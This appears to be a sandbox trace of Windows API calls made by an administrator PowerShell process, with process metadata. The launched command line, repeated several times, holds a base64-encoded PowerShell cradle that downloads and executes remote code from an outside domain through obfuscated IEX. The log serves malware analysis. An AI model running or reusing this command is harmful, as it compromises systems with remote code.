	[0326.960] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.960] SetErrorMode (uMode=0x1) returned 0x1
	[0326.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.960] SetErrorMode (uMode=0x1) returned 0x1
	[0326.960] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.961] SetErrorMode (uMode=0x1) returned 0x1
	[0326.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.961] SetErrorMode (uMode=0x1) returned 0x1
	[0326.961] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.961] SetErrorMode (uMode=0x1) returned 0x1
	[0326.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.962] SetErrorMode (uMode=0x1) returned 0x1
	[0326.962] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.962] SetErrorMode (uMode=0x1) returned 0x1
	[0326.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.963] SetErrorMode (uMode=0x1) returned 0x1
	[0326.963] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.963] SetErrorMode (uMode=0x1) returned 0x1
	[0326.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.716] SetErrorMode (uMode=0x1) returned 0x1
	[0327.716] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.716] SetErrorMode (uMode=0x1) returned 0x1
	[0327.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.717] SetErrorMode (uMode=0x1) returned 0x1
	[0327.717] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.717] SetErrorMode (uMode=0x1) returned 0x1
	[0327.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.717] SetErrorMode (uMode=0x1) returned 0x1
	[0327.717] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.718] SetErrorMode (uMode=0x1) returned 0x1
	[0327.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.718] SetErrorMode (uMode=0x1) returned 0x1
	[0327.718] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.718] SetErrorMode (uMode=0x1) returned 0x1
	[0327.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.719] SetErrorMode (uMode=0x1) returned 0x1
	[0327.719] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.719] SetErrorMode (uMode=0x1) returned 0x1
	[0327.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.719] SetErrorMode (uMode=0x1) returned 0x1
	[0327.719] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.719] SetErrorMode (uMode=0x1) returned 0x1
	[0327.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.720] SetErrorMode (uMode=0x1) returned 0x1
	[0327.720] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.720] SetErrorMode (uMode=0x1) returned 0x1
	[0327.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.720] SetErrorMode (uMode=0x1) returned 0x1
	[0327.720] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.721] SetErrorMode (uMode=0x1) returned 0x1
	[0327.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.721] SetErrorMode (uMode=0x1) returned 0x1
	[0327.721] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.721] SetErrorMode (uMode=0x1) returned 0x1
	[0327.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.722] SetErrorMode (uMode=0x1) returned 0x1
	[0327.722] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.722] SetErrorMode (uMode=0x1) returned 0x1
	[0327.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.722] SetErrorMode (uMode=0x1) returned 0x1
	[0327.722] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.723] SetErrorMode (uMode=0x1) returned 0x1
	[0327.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.723] SetErrorMode (uMode=0x1) returned 0x1
	[0327.723] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2ce340
	[0327.724] FindNextFileW (in: hFindFile=0x2ce340, lpFindFileData=0x1c8fde50 | out: lpFindFileData=0x1c8fde50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.725] FindClose (in: hFindFile=0x2ce340 | out: hFindFile=0x2ce340) returned 1
	[0327.725] SetErrorMode (uMode=0x1) returned 0x1
	[0328.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8fdf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0328.290] SetErrorMode (uMode=0x1) returned 0x1
	[0328.290] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8fe170 | out: lpFileInformation=0x1c8fe170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0328.291] SetErrorMode (uMode=0x1) returned 0x1
	[0328.754] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0328.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.754] CoTaskMemFree (pv=0x389b60) 
	[0329.354] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0329.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.354] CoTaskMemFree (pv=0x389b60) 
	[0329.357] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0329.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.357] CoTaskMemFree (pv=0x389b60) 
	[0329.367] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0329.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.367] CoTaskMemFree (pv=0x389b60) 
	[0329.946] CoTaskMemAlloc (cb=0x3b) returned 0x1b9287c0
	[0330.532] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8fe358, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8fe358) returned 0x4550
	[0330.532] CoTaskMemFree (pv=0x1b9287c0) 
	[0330.535] GetConsoleWindow () returned 0x301d6
	[0330.541] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0330.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.541] CoTaskMemFree (pv=0x389b60) 
	[0330.542] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0330.542] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.542] CoTaskMemFree (pv=0x389b60) 
	[0330.546] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0330.546] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.546] CoTaskMemFree (pv=0x389b60) 
	[0330.548] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c8fe3a0 | out: pNumArgs=0x1c8fe3a0) returned 0x2fe3e0*=""
	[0330.549] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.550] CoTaskMemAlloc (cb=0x22) returned 0x3670e0
	[0330.550] RtlMoveMemory (in: Destination=0x3670e0, Source=0x2fe402, Length=0x20 | out: Destination=0x3670e0) 
	[0330.550] CoTaskMemFree (pv=0x3670e0) 
	[0330.550] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.550] CoTaskMemAlloc (cb=0x2f4) returned 0x1b936890
	[0330.550] RtlMoveMemory (in: Destination=0x1b936890, Source=0x2fe422, Length=0x2f2 | out: Destination=0x1b936890) 
	[0330.550] CoTaskMemFree (pv=0x1b936890) 
	[0330.551] LocalFree (hMem=0x2fe3e0) returned 0x0
	[0331.161] CoTaskMemAlloc (cb=0x804) returned 0x1b92da70
	[0331.161] GetConsoleTitleW (in: lpConsoleTitle=0x1b92da70, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0331.161] CoTaskMemFree (pv=0x1b92da70) 
	[0331.770] CoTaskMemAlloc (cb=0x38e) returned 0x2fe3e0
	[0331.770] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c8fe300*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x309a610 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x309a610*(hProcess=0x360, hThread=0x2e4, dwProcessId=0xf4c, dwThreadId=0xf50)) returned 1
	[0331.773] CoTaskMemFree (pv=0x2fe3e0) 
	[0331.774] CloseHandle (hObject=0x2e4) returned 1
	[0331.775] CoTaskMemAlloc (cb=0x3b) returned 0x1b9287c0
	[0331.775] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8fe3a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8fe3a8) returned 0x4550
	[0331.775] CoTaskMemFree (pv=0x1b9287c0) 
	[0331.778] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.778] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.779] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8fe488, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8fe488*=0x2e4) returned 1

Process:
	id = "11"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x31718000"
	os_pid = "0x984"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 62
	os_tid = 0x8dc

	[0251.380] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0253.224] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
